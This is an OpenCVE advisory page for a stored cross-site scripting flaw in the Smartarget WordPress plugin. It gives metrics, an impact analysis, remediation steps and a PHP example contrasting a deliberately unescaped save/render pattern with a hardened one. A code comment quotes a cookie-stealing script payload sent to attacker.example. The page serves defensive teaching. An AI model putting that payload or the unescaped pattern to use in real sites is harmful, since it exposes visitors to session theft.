Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Erez Hadas-Sonnenschein Smartarget smartarget-contact-us allows Stored XSS. This issue affects Smartarget: from n/a through <= 1.5.3.
Published: 2025-02-18
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The Smartarget plugin for WordPress (the record names the affected component as smartarget-contact-us) does not properly neutralize user-supplied input when generating web pages, which permits stored cross-site scripting (CWE-79). An attacker who can submit input through the plugin can place script in data the plugin persists; that data is later rendered, unescaped, into pages served to site visitors. Because the payload is stored rather than merely reflected, it is not limited to the attacker's own request but executes in the browser of every user who views the affected page.

Affected Systems

This flaw affects the Smartarget plugin for WordPress up to and including version 1.5.3. The record gives no lower bound ("n/a"), so every release up to 1.5.3 should be treated as affected; the advisory originally covered releases through 1.4 and was later extended to 1.5.3. Any site running one of those releases is exposed.

Risk and Exploitability

The CVSS 3.1 base score of 6.5 (vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L) rates this stored XSS as medium severity: it is reachable over the network with low attack complexity, but the attacker needs a low-privileged account (PR:L) and a victim must interact with the injected content (UI:R); the changed scope reflects that the script runs in the victim's browser rather than in the plugin itself. The EPSS score of less than 1% indicates a very low predicted probability of exploitation at the time the data was collected, the SSVC assessment in the history records no known exploitation and rates the flaw as not automatable, and the vulnerability is not listed in the CISA KEV catalog. Exploitation requires submitting malicious input through the plugin's interface; the input is stored and rendered into pages viewed by other users. The overall risk is therefore moderate, but because script executing in another user's browser can be used to steal sessions or perform actions with that user's privileges, the flaw should be remediated promptly.

Generated by OpenCVE AI on May 2, 2026 at 11:14 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the Smartarget WordPress plugin to a release newer than 1.5.3 as soon as the vendor publishes one that addresses the stored‑XSS flaw; at the time of writing the record lists no fixed version.
  • If an immediate update is not possible, disable or uninstall the Smartarget plugin so the vulnerable code path cannot be reached, and review and remove any data previously stored through the plugin to clear script that may already have been injected.
  • Implement a Content Security Policy on the site's front end that does not allow inline scripts (no 'unsafe-inline' in script-src), which limits the impact of any residual stored script content even if a template still echoes it unescaped.

Generated by OpenCVE AI on May 2, 2026 at 11:14 UTC.
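As an added illustration, not code from the Smartarget plugin (whose source is not reproduced on this page) or from OpenCVE: the CWE-79 pattern the Impact section describes, beside the hardened form the recommended actions call for and the front-end CSP they suggest. All function, option and nonce names (xss_demo_*, demo_contact_label, demo_contact_save) are invented for the example.

```php
<?php
/**
 * Illustration only: a stored-XSS pattern of the CWE-79 kind described in the
 * advisory, beside a hardened version.  This is not Smartarget's code; every
 * function, option and nonce name below (xss_demo_*, demo_contact_label,
 * demo_contact_save) is invented for the example.
 */

// ---- Vulnerable pattern (for contrast; do not deploy) ----------------------
// Request input is persisted verbatim and later echoed into HTML unescaped.
// A payload such as <script>fetch('https://attacker.example/?c='+document.cookie)</script>
// sits in the database and runs for every visitor of the page that renders it.
function xss_demo_save_unsafe() {
    if ( isset( $_POST['demo_contact_label'] ) ) {
        update_option( 'demo_contact_label', $_POST['demo_contact_label'] ); // raw
    }
}

function xss_demo_render_unsafe() {
    echo '<div class="demo-contact">' . get_option( 'demo_contact_label', '' ) . '</div>';
}

// ---- Hardened pattern -------------------------------------------------------
// 1. Gate the write behind a capability check and a nonce, so a low-privileged
//    account (the PR:L in the CVSS vector) cannot reach it.
// 2. Sanitize on save as defence in depth.
// 3. Escape at output for the context the value lands in: esc_html() for the
//    HTML body, esc_attr() inside attributes, esc_url() for href/src.
//    Output escaping is the control that actually addresses CWE-79; data may
//    reach the option through other code paths than this form.
function xss_demo_save_safe() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    // The form must emit wp_nonce_field( 'demo_contact_save', 'demo_contact_nonce' ).
    check_admin_referer( 'demo_contact_save', 'demo_contact_nonce' );
    if ( isset( $_POST['demo_contact_label'] ) ) {
        $label = sanitize_text_field( wp_unslash( $_POST['demo_contact_label'] ) );
        update_option( 'demo_contact_label', $label );
    }
}

function xss_demo_render_safe() {
    echo '<div class="demo-contact">' . esc_html( get_option( 'demo_contact_label', '' ) ) . '</div>';
}

// ---- Compensating control: front-end CSP without 'unsafe-inline' ------------
// Shipped from a must-use plugin or the theme.  With no 'unsafe-inline' in
// script-src, the browser refuses inline <script> blocks and on* handlers even
// if a template still echoes stored markup unescaped.  Scope it to the front
// end (wp-admin depends on inline scripts) and start with
// Content-Security-Policy-Report-Only to find legitimate inline scripts first.
add_action( 'send_headers', function () {
    if ( is_admin() ) {
        return;
    }
    header( "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'" );
} );
```

When auditing an installed copy of any plugin for this class of bug, search its templates for `echo` or `print` of `get_option()`, `get_post_meta()` or `$_POST`/`$_GET` values that are not wrapped in an `esc_*()` or `wp_kses*()` call; each such spot is a candidate for the unsafe pattern above.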

Advisories
Source: EUVD
ID: EUVD-2025-4784
Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Erez Hadas-Sonnenschein Smartarget allows Stored XSS. This issue affects Smartarget: from n/a through 1.4.
History

Wed, 29 Apr 2026 10:15:00 +0000

  Metrics (cvssV3_1): {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

  Description
    Removed: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Erez Hadas-Sonnenschein Smartarget allows Stored XSS. This issue affects Smartarget: from n/a through 1.4.
    Added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Erez Hadas-Sonnenschein Smartarget smartarget-contact-us allows Stored XSS. This issue affects Smartarget: from n/a through <= 1.5.3.
  Title
    Removed: WordPress Smartarget.online Integration plugin <= 1.4 - Cross Site Scripting (XSS) vulnerability
    Added: WordPress Smartarget.online Integration plugin <= 1.5.3 - Cross Site Scripting (XSS) vulnerability
  References
  Metrics (cvssV3_1): {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Tue, 18 Feb 2025 20:15:00 +0000

  Metrics (ssvc): {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 18 Feb 2025 20:00:00 +0000

  Description (added): Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Erez Hadas-Sonnenschein Smartarget allows Stored XSS. This issue affects Smartarget: from n/a through 1.4.
  Title (added): WordPress Smartarget.online Integration plugin <= 1.4 - Cross Site Scripting (XSS) vulnerability
  Weaknesses (added): CWE-79
  References
  Metrics (cvssV3_1): {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


Subscriptions

Wordpress

MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-29T09:51:53.756Z

Reserved: 2025-01-07T21:02:43.843Z

Link: CVE-2025-22650

Vulnrichment

Updated: 2025-02-18T20:09:21.650Z

NVD

Status: Deferred

Published: 2025-02-18T20:15:26.720

Modified: 2026-04-29T10:16:39.590

Link: CVE-2025-22650

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-02T11:15:19Z

Weaknesses